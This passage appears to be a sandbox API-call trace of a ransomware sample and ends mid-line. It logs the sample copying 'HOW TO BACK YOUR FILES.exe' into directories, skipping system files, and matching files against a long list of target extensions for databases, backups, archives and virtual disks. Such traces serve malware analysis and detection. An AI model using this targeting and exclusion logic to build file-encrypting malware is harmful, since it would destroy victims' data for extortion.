[0060.167] CloseHandle (hObject=0x12c) returned 1 [0060.167] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.167] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.167] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.167] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.167] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.167] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.167] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.167] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.167] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.167] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.167] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.167] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a423f80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.167] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.168] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a423f80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.168] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.168] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0060.168] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low" [0060.168] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0060.168] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0060.168] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low") returned 65 [0060.168] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low" [0060.168] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.168] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.168] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.169] GetLastError () returned 0x0 [0060.169] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.169] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.169] CloseHandle (hObject=0x12c) returned 1 [0060.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.169] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.169] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.169] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.169] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.169] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.169] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.169] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.169] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.169] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.169] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.169] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a44a0e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.169] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.169] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a44a0e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.169] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.170] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0060.170] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5" [0060.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0060.170] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0060.170] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5") returned 73 [0060.170] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5" [0060.170] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.170] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.170] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.170] GetLastError () returned 0x0 [0060.170] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.170] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.170] CloseHandle (hObject=0x12c) returned 1 [0060.171] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.171] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.171] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4bc500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.171] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.171] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.171] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.171] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4bc500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.171] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.171] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.171] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.171] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.171] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x661a180, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x661a180, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e570c75, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.171] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.171] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0060.171] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0060.171] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0060.171] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0060.171] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0060.171] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0060.171] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0060.171] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0060.171] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0060.171] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0060.171] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0060.171] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0060.172] lstrlenW (lpString="desktop.ini") returned 11 [0060.172] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\*") returned 75 [0060.172] lstrcpyW (in: lpString1=0x2cce494, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0060.172] lstrlenW (lpString="desktop.ini") returned 11 [0060.172] lstrlenW (lpString="Ares865") returned 7 [0060.172] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0060.172] lstrlenW (lpString=".dll") returned 4 [0060.172] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0060.172] lstrlenW (lpString=".lnk") returned 4 [0060.172] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0060.172] lstrlenW (lpString=".ini") returned 4 [0060.172] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0060.172] lstrlenW (lpString=".sys") returned 4 [0060.172] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0060.172] lstrlenW (lpString="desktop.ini") returned 11 [0060.172] lstrlenW (lpString="bak") returned 3 [0060.172] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0060.172] lstrlenW (lpString="ba_") returned 3 [0060.172] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0060.172] lstrlenW (lpString="dbb") returned 3 [0060.172] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0060.172] lstrlenW (lpString="vmdk") returned 4 [0060.172] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0060.172] lstrlenW (lpString="rar") returned 3 [0060.172] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0060.172] lstrlenW (lpString="zip") returned 3 [0060.172] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0060.172] lstrlenW (lpString="tgz") returned 3 [0060.172] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0060.172] lstrlenW (lpString="vbox") returned 4 [0060.172] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0060.172] lstrlenW (lpString="vdi") returned 3 [0060.172] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0060.172] lstrlenW (lpString="vhd") returned 3 [0060.172] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0060.172] lstrlenW (lpString="vhdx") returned 4 [0060.172] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0060.172] lstrlenW (lpString="avhd") returned 4 [0060.173] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0060.173] lstrlenW (lpString="db") returned 2 [0060.173] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0060.173] lstrlenW (lpString="db2") returned 3 [0060.173] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0060.173] lstrlenW (lpString="db3") returned 3 [0060.173] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0060.173] lstrlenW (lpString="dbf") returned 3 [0060.173] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0060.173] lstrlenW (lpString="mdf") returned 3 [0060.173] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0060.173] lstrlenW (lpString="mdb") returned 3 [0060.173] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0060.173] lstrlenW (lpString="sql") returned 3 [0060.173] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0060.173] lstrlenW (lpString="sqlite") returned 6 [0060.173] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0060.173] lstrlenW (lpString="sqlite3") returned 7 [0060.173] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0060.173] lstrlenW (lpString="sqlitedb") returned 8 [0060.173] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0060.173] lstrlenW (lpString="xml") returned 3 [0060.173] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0060.173] lstrlenW (lpString="$er") returned 3 [0060.173] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0060.173] lstrlenW (lpString="4dd") returned 3 [0060.173] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0060.173] lstrlenW (lpString="4dl") returned 3 [0060.173] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0060.173] lstrlenW (lpString="^^^") returned 3 [0060.173] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0060.173] lstrlenW (lpString="abs") returned 3 [0060.173] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0060.173] lstrlenW (lpString="abx") returned 3 [0060.173] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0060.173] lstrlenW (lpString="accdb") returned 5 [0060.173] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0060.173] lstrlenW (lpString="accdc") returned 5 [0060.173] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0060.174] lstrlenW (lpString="accde") returned 5 [0060.174] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0060.174] lstrlenW (lpString="accdr") returned 5 [0060.174] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0060.174] lstrlenW (lpString="accdt") returned 5 [0060.174] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0060.174] lstrlenW (lpString="accdw") returned 5 [0060.174] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0060.174] lstrlenW (lpString="accft") returned 5 [0060.174] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0060.174] lstrlenW (lpString="adb") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.174] lstrlenW (lpString="adb") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.174] lstrlenW (lpString="ade") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0060.174] lstrlenW (lpString="adf") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0060.174] lstrlenW (lpString="adn") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0060.174] lstrlenW (lpString="adp") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0060.174] lstrlenW (lpString="alf") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0060.174] lstrlenW (lpString="ask") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0060.174] lstrlenW (lpString="btr") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0060.174] lstrlenW (lpString="cat") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0060.174] lstrlenW (lpString="cdb") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0060.174] lstrlenW (lpString="ckp") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0060.174] lstrlenW (lpString="cma") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0060.174] lstrlenW (lpString="cpd") returned 3 [0060.174] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0060.175] lstrlenW (lpString="dacpac") returned 6 [0060.175] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0060.175] lstrlenW (lpString="dad") returned 3 [0060.175] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0060.175] lstrlenW (lpString="dadiagrams") returned 10 [0060.175] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0060.175] lstrlenW (lpString="daschema") returned 8 [0060.175] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0060.175] lstrlenW (lpString="db-journal") returned 10 [0060.175] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0060.175] lstrlenW (lpString="db-shm") returned 6 [0060.175] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0060.175] lstrlenW (lpString="db-wal") returned 6 [0060.175] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0060.175] lstrlenW (lpString="dbc") returned 3 [0060.175] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0060.175] lstrlenW (lpString="dbs") returned 3 [0060.175] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0060.175] lstrlenW (lpString="dbt") returned 3 [0060.175] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0060.175] lstrlenW (lpString="dbv") returned 3 [0060.175] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0060.175] lstrlenW (lpString="dbx") returned 3 [0060.175] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0060.175] lstrlenW (lpString="dcb") returned 3 [0060.175] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0060.175] lstrlenW (lpString="dct") returned 3 [0060.175] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0060.175] lstrlenW (lpString="dcx") returned 3 [0060.175] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0060.175] lstrlenW (lpString="ddl") returned 3 [0060.175] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0060.175] lstrlenW (lpString="dlis") returned 4 [0060.175] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0060.175] lstrlenW (lpString="dp1") returned 3 [0060.175] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0060.175] lstrlenW (lpString="dqy") returned 3 [0060.175] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0060.176] lstrlenW (lpString="dsk") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0060.176] lstrlenW (lpString="dsn") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0060.176] lstrlenW (lpString="dtsx") returned 4 [0060.176] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0060.176] lstrlenW (lpString="dxl") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0060.176] lstrlenW (lpString="eco") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0060.176] lstrlenW (lpString="ecx") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0060.176] lstrlenW (lpString="edb") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0060.176] lstrlenW (lpString="epim") returned 4 [0060.176] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0060.176] lstrlenW (lpString="fcd") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0060.176] lstrlenW (lpString="fdb") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0060.176] lstrlenW (lpString="fic") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0060.176] lstrlenW (lpString="flexolibrary") returned 12 [0060.176] lstrlenW (lpString="fm5") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0060.176] lstrlenW (lpString="fmp") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0060.176] lstrlenW (lpString="fmp12") returned 5 [0060.176] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0060.176] lstrlenW (lpString="fmpsl") returned 5 [0060.176] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0060.176] lstrlenW (lpString="fol") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0060.176] lstrlenW (lpString="fp3") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0060.176] lstrlenW (lpString="fp4") returned 3 [0060.176] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0060.176] lstrlenW (lpString="fp5") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0060.177] lstrlenW (lpString="fp7") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0060.177] lstrlenW (lpString="fpt") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0060.177] lstrlenW (lpString="frm") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0060.177] lstrlenW (lpString="gdb") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.177] lstrlenW (lpString="gdb") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.177] lstrlenW (lpString="grdb") returned 4 [0060.177] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0060.177] lstrlenW (lpString="gwi") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0060.177] lstrlenW (lpString="hdb") returned 3 [0060.177] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 